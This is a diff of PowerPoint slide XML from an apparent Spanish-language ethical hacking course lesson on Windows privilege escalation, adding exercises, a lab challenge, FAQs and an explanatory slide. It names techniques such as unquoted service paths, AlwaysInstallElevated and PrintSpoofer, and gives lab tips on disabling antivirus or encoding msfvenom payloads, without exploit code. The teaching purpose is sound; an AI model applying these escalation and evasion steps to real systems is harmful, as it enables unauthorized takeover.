--- a/classes/parte-3-hacking-etico-y-pentesting-metodologia/077-escalada-de-privilegios-en-windows/clase-077-presentacion.pptx
+++ b/classes/parte-3-hacking-etico-y-pentesting-metodologia/077-escalada-de-privilegios-en-windows/clase-077-presentacion.pptx
@@ -17,6 +17,9 @@
     <p:sldId id="265" r:id="rId16"/>
     <p:sldId id="266" r:id="rId17"/>
     <p:sldId id="267" r:id="rId18"/>
+    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="270" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3198,7 +3201,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>⚠️ Errores comunes</a:t>
+              <a:t>✍️ Ejercicios</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3236,82 +3239,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  WinPEAS bloqueado por el antivirus — Comportamiento esperado en producción; en el laboratorio, desactivar temporalmente el AV o usar la firma menos detectada</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  accesschk.exe no reconocido — Falta descargar Sysinternals Suite; agregar la carpeta al PATH o invocar con ruta absoluta</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  El servicio no reinicia tras reemplazar el binario — Faltan permisos para reiniciar el servicio; verificar con sc qc NombreServicio y usar una cuenta con SERVICESTART</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  AlwaysInstallElevated parece activo pero el MSI no eleva — Solo una de las dos claves (HKCU/HKLM) está en 1; deben estar ambas</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  PrintSpoofer falla con "Access Denied" — La cuenta no tiene SeImpersonatePrivilege habilitado; confirmar con whoami /priv</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  El payload de msfvenom es detectado de inmediato — AV moderno con firmas conocidas; en laboratorio, usar encoding o deshabilitar temporalmente el AV, nunca en producción sin autorización</a:t>
+              <a:t>•  Ejecuta WinPEAS y clasifica los tres hallazgos con mayor probabilidad de escalada.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Configura intencionalmente un servicio con ruta sin comillas y demuestra su explotación.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Usa PowerUp para detectar el mismo servicio y compara la salida con WinPEAS.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Verifica y explota (en laboratorio) una configuración AlwaysInstallElevated activa.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Investiga y documenta conceptualmente cómo PrintSpoofer abusa de SeImpersonatePrivilege, sin necesidad de ejecutar el exploit en un sistema de producción.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Escribe una lista de comandos de hardening (GPO o PowerShell) para cerrar cada vector estudiado.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3362,7 +3365,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>❓ Preguntas frecuentes</a:t>
+              <a:t>📝 Reto verificable</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3400,97 +3403,22 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  ❓ ¿Es necesario tener antivirus desactivado para practicar esto?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  No es obligatorio, pero en el laboratorio suele desactivarse temporalmente para centrarse en la lógica de la técnica; en un pentest real, evadir EDR es una habilidad separada que se practica en otra clase.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿UAC me protege de estos ataques?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  UAC filtra ejecuciones interactivas, pero Microsoft explícitamente no lo considera un límite de seguridad; muchas de estas técnicas (servicios, tokens, AlwaysInstallElevated) no dependen de UAC en absoluto.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Por qué SeImpersonatePrivilege suele estar presente en cuentas de servicio?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Porque muchos servicios web (IIS, MSSQL) necesitan impersonar al usuario autenticado para acceder a recursos con su identidad; es funcionalidad legítima que se vuelve peligrosa si el atacante compromete ese servicio.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Cómo detecta un equipo azul esta escalada?</a:t>
+              <a:t>•  Reto: en tu VM Windows de laboratorio (con al menos dos vectores configurados: un servicio con permisos débiles y AlwaysInstallElevated activo), obtén privilegios de SYSTEM o administrador local por…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Criterio de aceptación: el alumno entrega evidencia de whoami mostrando nt authority\system (o cuenta administradora) para cada uno de los dos métodos, con el comando exacto de explotación y la…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3541,7 +3469,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🔗 Referencias</a:t>
+              <a:t>⚠️ Errores comunes</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3579,6 +3507,349 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>•  WinPEAS bloqueado por el antivirus — Comportamiento esperado en producción; en el laboratorio, desactivar temporalmente el AV o usar la firma menos detectada</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  accesschk.exe no reconocido — Falta descargar Sysinternals Suite; agregar la carpeta al PATH o invocar con ruta absoluta</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  El servicio no reinicia tras reemplazar el binario — Faltan permisos para reiniciar el servicio; verificar con sc qc NombreServicio y usar una cuenta con SERVICESTART</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  AlwaysInstallElevated parece activo pero el MSI no eleva — Solo una de las dos claves (HKCU/HKLM) está en 1; deben estar ambas</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  PrintSpoofer falla con "Access Denied" — La cuenta no tiene SeImpersonatePrivilege habilitado; confirmar con whoami /priv</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  El payload de msfvenom es detectado de inmediato — AV moderno con firmas conocidas; en laboratorio, usar encoding o deshabilitar temporalmente el AV, nunca en producción sin autorización</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>❓ Preguntas frecuentes</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Es necesario tener antivirus desactivado para practicar esto?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  No es obligatorio, pero en el laboratorio suele desactivarse temporalmente para centrarse en la lógica de la técnica; en un pentest real, evadir EDR es una habilidad separada que se practica en otra…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿UAC me protege de estos ataques?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  UAC filtra ejecuciones interactivas, pero Microsoft explícitamente no lo considera un límite de seguridad; muchas de estas técnicas (servicios, tokens, AlwaysInstallElevated) no dependen de UAC en…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Por qué SeImpersonatePrivilege suele estar presente en cuentas de servicio?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Porque muchos servicios web (IIS, MSSQL) necesitan impersonar al usuario autenticado para acceder a recursos con su identidad; es funcionalidad legítima que se vuelve peligrosa si el atacante…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Cómo detecta un equipo azul esta escalada?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>🔗 Referencias</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>•  Peter Kim, The Hacker Playbook 3, Secure Planet LLC.</a:t>
             </a:r>
           </a:p>
@@ -3644,6 +3915,81 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274320"/>
+            <a:ext cx="8229600" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Diagrama de la clase</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="90356dd9c0af6f83.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="2468880"/>
+            <a:ext cx="8229600" cy="2560320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -3728,7 +4074,7 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  El alumno aprenderá a enumerar un host Windows comprometido con una cuenta estándar, identificar configuraciones inseguras (servicios con rutas o permisos débiles, políticas de instalación permisivas, privilegios de token abusables) y escalar hasta SYSTEM o administrador local en un entorno de laboratorio propio, entendiendo además cómo el equipo defensivo audita y corrige cada vector.</a:t>
+              <a:t>•  El alumno aprenderá a enumerar un host Windows comprometido con una cuenta estándar, identificar configuraciones inseguras (servicios con rutas o permisos débiles, políticas de instalación…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4137,7 +4483,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📖 Definiciones y características</a:t>
+              <a:t>🧠 Explicación en profundidad</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4175,97 +4521,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  WinPEAS: script de enumeración de la suite PEASS-ng para Windows, análogo a LinPEAS. Característica clave: colorea hallazgos por probabilidad de explotación, priorizando el trabajo del pentester.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Enfoque defensivo: correr WinPEAS de forma controlada en tu propio parque de máquinas permite a seguridad identificar y remediar hallazgos antes de que un atacante los encuentre.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Unquoted service path: ruta de ejecutable de un servicio que contiene espacios y no está entre comillas. Característica clave: Windows intenta ejecutar cada segmento de la ruta hasta el primer espacio, permitiendo colocar un binario malicioso en una carpeta intermedia escribible.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Enfoque defensivo: forzar el uso de comillas en todas las rutas de servicio (auditable con GPO o scripts de compliance) elimina este vector de raíz.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Servicio con permisos débiles: un servicio cuyo binario, carpeta contenedora o clave de registro son modificables por un usuario no privilegiado. Característica clave: sustituir el binario y reiniciar el servicio ejecuta código arbitrario con el privilegio del servicio (a menudo SYSTEM).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Enfoque defensivo: aplicar ACLs estrictas (solo administradores con escritura) sobre binarios y carpetas de servicios es una revisión de hardening de bajo costo y alto impacto.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  AlwaysInstallElevated: par de claves de registro (HKCU y HKLM) que, si ambas están activas, permiten a cualquier usuario instalar paquetes .msi con privilegios de SYSTEM. Característica clave: requiere ambas claves activas simultáneamente para ser explotable.</a:t>
+              <a:t>•  En Windows la escalada va de una cuenta de usuario a administrador local y, desde ahí, a</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  SYSTEM —la cuenta de servicio con el máximo privilegio, por encima incluso del</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  administrador—. Como en Linux, el camino rara vez es un exploit y casi siempre una</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  configuración incorrecta: un servicio con una ruta mal escrita, una carpeta escribible</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  donde no debería, una política de instalación peligrosa, un privilegio de token mal</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  concedido. La enumeración es de nuevo el primer paso, y WinPEAS y PowerUp (parte de</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  PowerSploit) automatizan la detección de decenas de estas debilidades en minutos.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4316,7 +4662,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
